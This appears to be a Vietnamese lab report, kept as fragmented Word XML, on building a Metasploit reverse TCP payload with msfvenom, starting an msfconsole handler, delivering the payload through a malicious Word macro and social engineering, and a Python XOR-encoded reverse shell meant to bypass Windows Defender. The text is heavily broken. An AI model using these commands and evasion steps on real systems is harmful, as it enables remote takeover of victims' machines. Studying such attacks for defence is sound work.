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9FE6" w14:textId="77777777" w:rsidR="00983469" w:rsidRPr="006C4EF0" w:rsidRDefault="00563BD8" w:rsidP="00563B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Hlk90746113"/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</w:p>
    <w:p w14:paraId="324D166B" w14:textId="77777777" w:rsidR="00563BD8" w:rsidRPr="006C4EF0" w:rsidRDefault="00563BD8" w:rsidP="00563B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4EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Macro </w:t>
      </w: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Word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5261D4DF" w14:textId="77777777" w:rsidR="00D01A05" w:rsidRPr="00A32012" w:rsidRDefault="00D01A05" w:rsidP="00D01A05">
      <w:pPr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Macro</w:t>
      </w:r>
      <w:r w:rsidRPr="00A3201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ở 1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Macro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ô,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Ribbon hay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menu,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ô,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, import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tgtFrame="_blank" w:tooltip="Access" w:history="1">
        <w:r w:rsidRPr="00A3201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Access</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A3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304C3A" w14:textId="77777777" w:rsidR="00D01A05" w:rsidRPr="00A32012" w:rsidRDefault="00D01A05" w:rsidP="00D01A05">
      <w:pPr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Ngoài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ra Macro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cũng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đem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rất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nhiều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lợi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ích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bạn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soạn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thảo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văn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bản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Pr="00A3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Word:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE8FF0C" w14:textId="77777777" w:rsidR="00D01A05" w:rsidRPr="00A32012" w:rsidRDefault="00D01A05" w:rsidP="00D01A0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8D4F1F" w14:textId="77777777" w:rsidR="00D01A05" w:rsidRPr="00A32012" w:rsidRDefault="00D01A05" w:rsidP="00D01A0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1122" w14:textId="77777777" w:rsidR="00D01A05" w:rsidRPr="00A32012" w:rsidRDefault="00D01A05" w:rsidP="00D01A0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9B1A05" w14:textId="77777777" w:rsidR="00D01A05" w:rsidRPr="00A32012" w:rsidRDefault="00D01A05" w:rsidP="00D01A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Macro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A421565" w14:textId="77777777" w:rsidR="00D01A05" w:rsidRPr="00A32012" w:rsidRDefault="00D01A05" w:rsidP="00D01A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Word</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043BACE5" w14:textId="77777777" w:rsidR="00563BD8" w:rsidRPr="006C4EF0" w:rsidRDefault="00563BD8" w:rsidP="00563B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4EF0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Reverse TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00648192" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="006C4EF0" w:rsidRDefault="00733F74" w:rsidP="00733F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CB703E" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F74">
      <w:pPr>
        <w:ind w:firstLine="357"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A32012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TCP/IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320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Transmission Control Protocol</w:t>
      </w:r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(Giao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thức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điều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khiển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truyền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A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/Internet Protocol </w:t>
      </w:r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Giao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thức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mạng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) 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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A32012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TCP/IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320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qua Internet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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599DC8D3" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F74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32012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reverse_tc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32012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reverse_tc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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152E27C3" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F74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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B826E7" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F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2012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Bind Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320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shell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(listener)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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B93534" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F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2012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Reverse Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320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shell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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393AB1BB" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F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Reverse TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC1225D" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F74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reverse_tc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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B500294" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F74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Mã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khai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thác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là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một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phần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mềm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một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đoạn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dữ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liệu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hoặc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một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chuỗi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câu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lệnh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lợi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dụng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lỗi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hoặc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lỗ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hổng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trong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ứng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dụng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hoặc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hệ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thống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để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tạo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hành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vi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ngoài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ý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muốn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hoặc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không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lường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trước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được</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A32012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277FDBD5" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F74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</w:p>
    <w:p w14:paraId="6F213BB7" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F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).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FCC44E" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F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gược</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4403C2AC" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F74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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F500E42" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F74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reverse_tc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shell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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3FE8A6" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="006C4EF0" w:rsidRDefault="00733F74" w:rsidP="00733F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cuộc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Reverse TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CCE6A5" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F74">
      <w:pPr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Ở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Reverse TCP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etasploi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framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB92693" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F74">
      <w:pPr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payload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ắ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b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AB3E88" w:rsidRPr="00A320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09BF0D" w14:textId="77777777" w:rsidR="00AB3E88" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="006A779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320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HOST</w:t>
      </w:r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IP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F333E8" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="006A779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320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PORT</w:t>
      </w:r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LHOST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1B317B" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F7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payload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463299" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F7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sfvenom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-p windows/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eterpreter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reverse_tc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LHOST=192.168.0.1 LPORT:4444 -f exe -e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md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/powershell_base64 -o ~/payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570FD53F" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F7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payload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20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exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00A3201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Windows)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20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owershell_base64</w:t>
      </w:r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20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ayload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1574BE89" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F7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lastRenderedPageBreak/>
        <w:t>Bâ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payload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social engineering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BE4FC8" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F7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Bâ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20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istener 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078678" w14:textId="77777777" w:rsidR="00AB3E88" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F7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sfconsole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BE8920" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F7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32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msf5&gt; use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599F812B" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F7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32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msf5 exploit(handler)&gt; set payload windows/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eterpreter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reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="572B21B7" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F7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msf5 exploit(handler)&gt; set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hos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192.168.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB9542E" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F7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msf5 exploit(handler)&gt; set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por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4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDF355C" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F7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32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msf5 exploit(handler)&gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0F03A7" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F7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handler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0C19D3" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F7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Bâ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payload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ở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payload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E88" w:rsidRPr="00A32012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social engineering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payload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478CBE" w14:textId="77777777" w:rsidR="00733F74" w:rsidRPr="00A32012" w:rsidRDefault="00733F74" w:rsidP="00733F7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, handler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ạ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3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EF2DBE" w14:textId="295957C1" w:rsidR="00563BD8" w:rsidRPr="00A32012" w:rsidRDefault="00280402" w:rsidP="00563B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file word </w:t>
      </w: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hại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Macro </w:t>
      </w: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CE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ypass Windows Defender</w:t>
      </w:r>
      <w:r w:rsidR="00425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0233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cập</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F0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0233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nhật</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004F0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023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4F0233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 30/10/2021</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBA87E5" w14:textId="1EF59EDC" w:rsidR="00280402" w:rsidRDefault="00AC5FA6" w:rsidP="002804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280402" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ayload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00280402" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Rever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280402" w:rsidRPr="00A32012">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1FA5D654" w14:textId="41F9185B" w:rsidR="00AC5FA6" w:rsidRDefault="00AC5FA6" w:rsidP="00AC5F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ayload :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0C28302E" w14:textId="24C11F82" w:rsidR="00AC5FA6" w:rsidRPr="00AC5FA6" w:rsidRDefault="00AC5FA6" w:rsidP="00AC5FA6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C5FA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">+ Payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC5FA6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AC5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5FA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>viết</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC5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5FA6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Pr="00AC5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5FA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ngôn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC5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5FA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ngữ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AC5FA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE29213" w14:textId="632F9165" w:rsidR="00AC5FA6" w:rsidRDefault="00AC5FA6" w:rsidP="00AC5FA6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C5FA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">+ File Listener </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC5FA6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AC5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5FA6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AC5FA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacker: attacker_listener.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E9AE67" w14:textId="21EF7034" w:rsidR="00AC5FA6" w:rsidRDefault="00AC5FA6" w:rsidP="00AC5FA6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C5FA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88532F" wp14:editId="60EC09E3">
            <wp:extent cx="5925377" cy="209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45E4" w14:textId="5ED6D8FC" w:rsidR="00EA412C" w:rsidRDefault="00EA412C" w:rsidP="00EA41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m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connecti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6C53AA4" w14:textId="734F1CA7" w:rsidR="00EA412C" w:rsidRDefault="00EA412C" w:rsidP="00EA412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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EA412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B0677CD" wp14:editId="24E5DC1E">
            <wp:extent cx="5943600" cy="2392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1C18" w14:textId="2E9FCF61" w:rsidR="00EA412C" w:rsidRDefault="00EA412C" w:rsidP="00EA41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yte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x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ncode_x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or_deco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XO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cti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ttacker</w:t>
      </w:r>
      <w:r w:rsidR="00A224B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90B08B" w14:textId="7524CF22" w:rsidR="00EA412C" w:rsidRDefault="00EA412C" w:rsidP="00EA412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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EA412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83E018" wp14:editId="64ED829F">
            <wp:extent cx="5943600" cy="20688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4E07" w14:textId="05A07A10" w:rsidR="00A224BF" w:rsidRDefault="00A224BF" w:rsidP="00A224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e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XOR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787769DD" w14:textId="62983FD4" w:rsidR="00A224BF" w:rsidRDefault="00A224BF" w:rsidP="00A224BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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A224B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D59198" wp14:editId="6BB5FAD9">
            <wp:extent cx="5943600" cy="23901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8565" w14:textId="77777777" w:rsidR="00EA412C" w:rsidRPr="00AC5FA6" w:rsidRDefault="00EA412C" w:rsidP="00EA412C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="792"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007F96B2" w14:textId="3F6E02AA" w:rsidR="00AC5FA6" w:rsidRDefault="00AC5FA6" w:rsidP="00AC5FA6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C5F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+ File Payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC5FA6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AC5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5FA6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AC5FA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> victim: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AC5FA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>target_reverse_tcp.py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file Payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA412C" w:rsidRPr="00AC5FA6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>target_reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.py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12C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file</w:t>
      </w:r>
      <w:r w:rsidR="00EA412C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.exe, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA412C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="00EA41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412C"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 w:rsidR="00EA41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412C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="00EA41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412C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="00EA412C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA412C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="00EA412C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EA412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="00EA412C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload_Bypass.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A68FED5" w14:textId="1342E341" w:rsidR="00EA412C" w:rsidRDefault="00EA412C" w:rsidP="00AC5FA6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EA412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161FD9" wp14:editId="47D06CEC">
            <wp:extent cx="5896798" cy="581106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F4FB" w14:textId="1B1ED297" w:rsidR="00A224BF" w:rsidRDefault="00A224BF" w:rsidP="00A224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cti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ttacke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onnect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881981E" w14:textId="22ADD725" w:rsidR="00A224BF" w:rsidRDefault="00A224BF" w:rsidP="00A224BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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A224B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04A13C" wp14:editId="227CA40A">
            <wp:extent cx="5943600" cy="21545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732C" w14:textId="37471C0E" w:rsidR="00A224BF" w:rsidRDefault="00A224BF" w:rsidP="00A224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yte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x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ncode_x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or_deco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XO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cti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ttacke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ile attacker_listener.py </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0C1436" w14:textId="3F113B6B" w:rsidR="00A224BF" w:rsidRDefault="00A224BF" w:rsidP="00A224BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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A224B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A542CF" wp14:editId="485D51A0">
            <wp:extent cx="5943600" cy="1969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5EFA" w14:textId="277CE637" w:rsidR="00A224BF" w:rsidRDefault="00A224BF" w:rsidP="00A224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e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ile attacker_listener.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9882E6" w14:textId="0BCE3091" w:rsidR="00A224BF" w:rsidRPr="00A224BF" w:rsidRDefault="00A224BF" w:rsidP="00A224BF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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A224B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029EF64" wp14:editId="11EDC3BB">
            <wp:extent cx="5943600" cy="24117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9759" w14:textId="697A8A6A" w:rsidR="00A224BF" w:rsidRDefault="00AC5FA6" w:rsidP="00A224B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yload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1CE82A" w14:textId="2E398B5A" w:rsidR="00A224BF" w:rsidRDefault="00A224BF" w:rsidP="00A224BF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Victim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file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target_reverse_tcp.pyw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nghĩ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gọi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nối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Attacker.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Attacker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đang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lắng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nghe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nối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khởi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="0041376F"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 w:rsidRPr="0041376F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="0041376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41376F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="0041376F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0041376F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Reverse_Shell_TCP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsid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376F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>thường</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004137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2C2C28" w14:textId="62CA5B13" w:rsidR="0041376F" w:rsidRDefault="0041376F" w:rsidP="00A224BF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41376F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau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nối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, Attacker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lệnh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cmd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Victim,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Victim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trả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màn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Attacker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76F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lệnh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004137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2DE1CF" w14:textId="5D2C1010" w:rsidR="0027145A" w:rsidRDefault="00AC5FA6" w:rsidP="00C9765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C97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711857" w14:textId="618196F6" w:rsidR="00C97657" w:rsidRPr="00D35AED" w:rsidRDefault="00C97657" w:rsidP="00C97657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D35AE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D35AED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D35AED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacker: Parrot OS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D35AED"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 w:rsidRPr="00D35AED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali-Linux OS (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D35AED"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 w:rsidRP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AED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>giống</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRP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AED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hệt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRP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AED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nhau</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D35AED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
